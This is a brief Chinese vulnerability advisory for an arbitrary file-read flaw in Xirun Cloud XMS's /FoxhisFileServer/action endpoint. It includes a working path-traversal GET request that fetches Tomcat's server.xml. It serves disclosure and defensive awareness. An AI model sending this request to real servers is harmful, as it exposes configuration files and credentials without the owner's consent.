西软云XMS /FoxhisFileServer/action 文件读取漏洞

2025-11-21 西软云XMS PoC Public

Description

西软云XMS是一款企业管理软件,广泛应用于酒店、餐饮等行业。该漏洞存在于/FoxhisFileServer/action接口中,攻击者可以通过构造恶意请求读取服务器上的任意文件,可能导致敏感信息泄露,例如系统配置文件、用户凭据等。

PoC

GET /FoxhisFileServer/action?method=download&filename=/../../../../../../../../../../../../tomcat/conf/server.xml HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities